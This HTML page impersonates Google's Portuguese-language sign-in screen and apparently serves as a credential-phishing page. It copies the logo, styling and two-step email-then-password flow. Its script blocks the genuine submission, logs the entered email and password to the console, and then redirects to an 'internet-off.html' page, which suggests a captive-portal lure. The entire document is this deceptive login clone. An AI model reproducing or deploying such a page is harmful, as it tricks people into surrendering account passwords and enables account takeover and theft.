<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Google Sign In</title>
    <style>
      @font-face {
        font-family: "LocalRoboto";
        src: local("Arial"), local("Helvetica"), local("sans-serif");
      }
      * {
        box-sizing: border-box;
      }
      body {
        font-family: "LocalRoboto", sans-serif;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
        background-color: #f0f4f969;
        font-size: 14px;
        font-weight: 400;
      }
      a {
        font-weight: 400;
        color: #0b57d0;
        text-decoration: none;
      }
      .commomLink::before {
        content: "";
        position: absolute;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        background: rgba(0, 0, 255, 0.1);
        border-radius: 100px;
        opacity: 0;
        transition: opacity 0.3s ease;
        transform: scaleX(1.05) scaleY(1.1);
      }
      .commomLink:hover::before {
        opacity: 1;
      }
      .commomLink {
        position: relative;
      }
      .main {
        display: flex;
        flex-direction: column;
        gap: 10px;
        max-width: 850px;
        width: 100%;
        margin: 0 auto;
      }
      .footer {
        display: flex;
        justify-content: space-between;
        align-items: center;
        gap: 20px;
        padding: 0 20px;
        width: 100%;
      }
      .footer ul {
        display: flex;
        gap: 20px;
        list-style: none;
      }
      .footer ul li a {
        color: #5f6368;
        font-size: 13px;
        font-weight: 400;
      }
      .language-dropdown {
        position: relative;
        display: inline-block;
      }
      .language-dropdown select {
        appearance: none;
        -webkit-appearance: none;
        -moz-appearance: none;
        background-color: transparent;
        border: none;
        font-size: 13px;
        cursor: pointer;
        color: #5f6368;
        outline: none;
      }
      .language-dropdown::after {
        content: "\25BE";
        position: absolute;
        top: 50%;
        right: -15px;
        transform: translateY(-50%);
        pointer-events: none;
        color: #5f6368;
        font-size: 14px;
      }
      .container {
        position: relative;
        width: 100%;
        display: flex;
        justify-content: space-between;
        gap: 20px;
        background-color: white;
        border-radius: 25px;
        padding: 48px 40px 36px;
        box-shadow: 0 2px 20px rgba(0, 0, 0, 0.02);
        min-height: 384px;
      }
      .aside-left {
        display: flex;
        flex-direction: column;
        gap: 10px;
      }
      .aside-left h1,
      .aside-left p {
        line-height: 1;
      }
      .aside-left h1 {
        font-size: 28px;
        font-weight: 400;
      }
      .aside-left p {
        font-size: 16px;
        font-weight: 400;
      }
      .aside-right {
        display: flex;
        flex-direction: column;
        gap: 35px;
        max-width: 400px;
        width: 100%;
        align-self: flex-end;
      }

      .aside-right-header {
        display: flex;
        flex-direction: column;
        gap: 12px;
      }
      .aside-right-header a {
        width: fit-content;
      }
      .aside-right-main p {
        line-height: 1.6;
        padding: 0;
        margin: 0;
        margin-bottom: 5px;
        font-weight: 300;
      }

      .aside-right-actions {
        align-self: flex-end;
        display: flex;
        align-items: center;
        gap: 30px;
      }
      .aside-right-actions a {
        position: relative;
      }
      .aside-right-actions a::before {
        content: "";
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        width: calc(100% + 24px);
        height: calc(100% + 24px);
        background: rgba(0, 0, 255, 0.1);
        border-radius: 100px;
        opacity: 0;
        transition: opacity 0.3s ease;
      }
      .aside-right-actions a:hover::before {
        opacity: 1;
      }
      .input-container {
        position: relative;
      }
      input[type="text"],
      input[type="email"],
      input[type="password"] {
        width: 100%;
        padding: 15px;
        font-size: 15.5px;
        border: 1px solid #060708;
        border-radius: 4px;
        box-sizing: border-box;
        font-weight: 400;
        transition: border-color 0.3s ease;
      }
      input[type="text"]:focus,
      input[type="email"]:focus,
      input[type="password"]:focus {
        outline: none;
        border-color: #1a73e8;
      }
      .input-label {
        position: absolute;
        left: 15px;
        top: 15px;
        font-size: 15.5px;
        color: #5f6368;
        transition: all 0.3s ease;
        pointer-events: none;
      }
      input:focus + .input-label,
      input:not(:placeholder-shown) + .input-label {
        top: -8px;
        left: 10px;
        font-size: 12px;
        background-color: white;
        padding: 0 5px;
        color: #1a73e8;
      }
      button {
        background-color: #0b57d0;
        color: white;
        border: none;
        padding: 12px 24px;
        font-size: 14px;
        border-radius: 100px;
        cursor: pointer;
        font-weight: 500;
        letter-spacing: 0.25px;
      }
      button:hover {
        background-color: #1565c0;
      }

      .spinner {
        position: absolute;
        top: 0;
        left: 0;
        width: 90%;
        margin-left: 20px;
        height: 5px;
        background: linear-gradient(to right, #2066d6, #326db1);
        transform: scaleX(0);
        transform-origin: left;
        animation: loading 0.5s infinite ease-in-out;
        display: none;
      }

      @keyframes loading {
        0% {
          transform: scaleX(0);
        }
        50% {
          transform: scaleX(0.5);
        }
        100% {
          transform: scaleX(1);
        }
      }

      .password-container {
        position: relative;
        flex-direction: column;
        gap: 10px;
        display: none;
        width: 100%;
      }

      .password-toggle {
        display: flex;
        align-items: center;
        gap: 10px;
        cursor: pointer;
        width: fit-content;
      }

      .password-toggle label {
        cursor: pointer;
      }
      .checkbox {
        appearance: none;
        -webkit-appearance: none;
        width: 18px;
        height: 18px;
        border: 2px solid #5f6368;
        border-radius: 2px;
        outline: none;
        cursor: pointer;
        position: relative;
        transition: all 0.3s ease;
      }

      .checkbox:hover {
        border-color: #1a73e8;
      }

      .checkbox:checked {
        background-color: #1a73e8;
        border-color: #1a73e8;
      }

      .checkbox:checked::before {
        content: "";
        position: absolute;
        top: 45%;
        left: 50%;
        transform: translate(-50%, -50%) rotate(45deg);
        width: 3px;
        height: 10px;
        border: solid white;
        border-width: 0 2px 2px 0;
      }

      .checkbox:focus {
        box-shadow: 0 0 0 2px rgba(26, 115, 232, 0.4);
      }

      #user-info {
        display: none;
        align-items: center;
        gap: 7px;
        border: 1px solid #e0e0e0;
        padding: 5px 30px 5px 7px;
        border-radius: 100px;
        width: fit-content;
      }

      #user-info span {
        position: relative;
      }

      #user-info span::after {
        content: "\25BE";
        position: absolute;
        top: 40%;
        right: -15px;
        transform: translateY(-50%);
        pointer-events: none;
        color: #5f6368;
        font-size: 14px;
      }

      @media screen and (max-width: 795px) {
        .main {
          max-width: 450px;
          padding: 20px;
        }
        .container {
          flex-direction: column;
          padding: 30px 20px;
        }
        .aside-right {
          max-width: 100%;
          padding-top: 0;
        }

        .footer ul {
          padding: 0;
        }
        .aside-right-actions {
          width: 100%;
          align-self: flex-start;
          justify-content: space-between;
        }
      }
      @media screen and (max-width: 450px) {
        body {
          background: white;
          align-items: flex-start;
        }
        .main {
          max-width: 100%;
          padding: 20px;
          height: 100%;
          justify-content: space-between;
        }
        .container {
          padding: 0;
          box-shadow: none;
        }
        .footer {
          padding: 0;
        }
        .aside-right-actions {
          width: 100%;
          align-self: flex-start;
          justify-content: space-between;
        }
        .language-dropdown::after {
          right: 0;
        }
      }
      @media screen and (min-width: 795px) and (max-width: 850px) {
        body {
          background: white;
          align-items: flex-start;
        }
        .main {
          max-width: 100%;
          padding: 20px;
          height: 100%;
          justify-content: space-between;
        }
        .container {
          padding: 0;
          box-shadow: none;
          display: flex;
          justify-content: space-between;
        }
        .footer {
          padding: 0;
        }
      }
      .error {
        border-color: #d93025 !important;
      }
      .error-text {
        color: #d93025;
        font-size: 12px;
        margin-top: 5px;
      }
    </style>
  </head>
  <body>
    <div class="main">
      <div class="container">
        <div class="spinner"></div>
        <div class="aside-left">
          <svg
            xmlns="https://www.w3.org/2000/svg"
            width="48"
            height="48"
            viewBox="0 0 40 48"
            aria-hidden="true"
            jsname="jjf7Ff"
          >
            <path
              fill="#4285F4"
              d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z"
            />
            <path
              fill="#34A853"
              d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z"
            />
            <path
              fill="#FABB05"
              d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z"
            />
            <path
              fill="#E94235"
              d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z"
            />
          </svg>
          <div>
            <h1 id="greeting">Fazer login</h1>
            <p id="user-info-text">Use sua Conta do Google</p>
            <div id="user-info">
              <svg
                aria-hidden="true"
                class="Qk3oof"
                fill="currentColor"
                focusable="false"
                width="18px"
                height="18px"
                viewBox="0 0 24 24"
                xmlns="https://www.w3.org/2000/svg"
              >
                <path
                  d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"
                ></path>
              </svg>
              <span id="user-email"></span>
            </div>
          </div>
        </div>
        <form class="aside-right" id="login-form" novalidate action="/get">
          <div>
            <div class="aside-right-header">
              <div class="input-container">
                <input
                  type="email"
                  placeholder=" "
                  id="email-input"
                  name="email"
                  required
                />
                <label for="email-input" class="input-label"
                  >E-mail ou telefone</label
                >
                <div class="error-text" id="email-error"></div>
              </div>
              <a class="commomLink" href="#">Esqueceu seu e-mail?</a>
            </div>
            <div class="password-container">
              <div class="input-container">
                <input
                  type="password"
                  placeholder=" "
                  id="password-input"
                  name="password"
                  required
                />
                <label for="password-input" class="input-label"
                  >Digite sua senha</label
                >
                <div class="error-text" id="password-error"></div>
              </div>
              <div class="password-toggle" onclick="togglePassword()">
                <input type="checkbox" class="checkbox" id="show-password" />
                <label for="show-password">Mostrar senha</label>
              </div>
            </div>
          </div>
          <div class="aside-right-main" id="info-text">
            <p>
              Não está no seu computador? Use janelas de navegação privada para
              fazer login.
            </p>
            <a class="commomLink" href="#"
              >Saiba mais sobre como usar o Modo visitante</a
            >
          </div>
          <div class="aside-right-actions">
            <a id="secondary-button" href="#">Criar conta</a>
            <button type="submit" id="submit-button">Próxima</button>
          </div>
        </form>
      </div>
      <div class="footer">
        <div class="language-dropdown">
          <select>
            <option value="pt-BR" selected>Português (Brasil)</option>
            <option value="en-US">English (United States)</option>
            <option value="es-ES">Español (España)</option>
            <option value="fr-FR">Français (France)</option>
            <option value="de-DE">Deutsch (Deutschland)</option>
          </select>
        </div>
        <ul>
          <li>
            <a href="#">Ajuda</a>
          </li>
          <li>
            <a href="#">Privacidade</a>
          </li>
          <li>
            <a href="#">Termos</a>
          </li>
        </ul>
      </div>
    </div>

    <script>
      let isEmailStep = true;

      function showSpinner() {
        document.getElementsByClassName("spinner")[0].style.display = "block";
        setTimeout(() => {
          document.getElementsByClassName("spinner")[0].style.display = "none";
          document.getElementsByClassName("container")[0].style.minHeight =
            "340px";
          if (isEmailStep) {
            document.getElementById("user-info-text").style.display = "none";
            document.getElementById("greeting").textContent = "Olá!";
            document.getElementById("user-info").style.display = "flex";
            document.getElementById("user-email").textContent =
              document.getElementById("email-input").value;
            document.getElementsByClassName(
              "aside-right-header"
            )[0].style.display = "none";
            document.getElementsByClassName(
              "password-container"
            )[0].style.display = "flex";
            document.getElementById("secondary-button").textContent =
              "Esqueceu a senha?";
            isEmailStep = false;
          } else {
            window.location.href = "internet-off.html";
          }
        }, 500);
      }

      function togglePassword() {
        const passwordInput = document.getElementById("password-input");
        const checkbox = document.getElementById("show-password");
        if (checkbox.checked) passwordInput.type = "text";
        else passwordInput.type = "password";
      }

      function validateEmail(email) {
        const re =
          /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
        return re.test(String(email).toLowerCase());
      }

      document
        .getElementById("login-form")
        .addEventListener("submit", function (event) {
          event.preventDefault();
          const emailInput = document.getElementById("email-input");
          const passwordInput = document.getElementById("password-input");
          const email = emailInput.value.trim();
          const password = passwordInput.value.trim();

          let isValid = true;

          if (isEmailStep) {
            if (!email || !validateEmail(email)) {
              isValid = false;
              emailInput.classList.add("error");
              document.getElementById("email-error").textContent =
                "Digite um e-mail válido";
            } else {
              emailInput.classList.remove("error");
              document.getElementById("email-error").textContent = "";
            }
          } else {
            if (!password) {
              isValid = false;
              passwordInput.classList.add("error");
              document.getElementById("password-error").textContent =
                "Digite sua senha";
            } else {
              passwordInput.classList.remove("error");
              document.getElementById("password-error").textContent = "";
            }
          }

          if (isValid) {
            console.log("Email:", email);
            console.log("Password:", password);
            showSpinner();
          }
        });

      document
        .getElementById("email-input")
        .addEventListener("blur", function () {
          if (this.value.trim() !== "") {
            if (!validateEmail(this.value.trim())) {
              this.classList.add("error");
              document.getElementById("email-error").textContent =
                "Digite um e-mail válido";
            } else {
              this.classList.remove("error");
              document.getElementById("email-error").textContent = "";
            }
          } else {
            this.classList.remove("error");
            document.getElementById("email-error").textContent = "";
          }
        });

      document
        .getElementById("password-input")
        .addEventListener("blur", function () {
          if (this.value.trim() !== "") {
            this.classList.remove("error");
            document.getElementById("password-error").textContent = "";
          } else {
            this.classList.add("error");
            document.getElementById("password-error").textContent =
              "Digite sua senha";
          }
        });
    </script>
  </body>
</html>
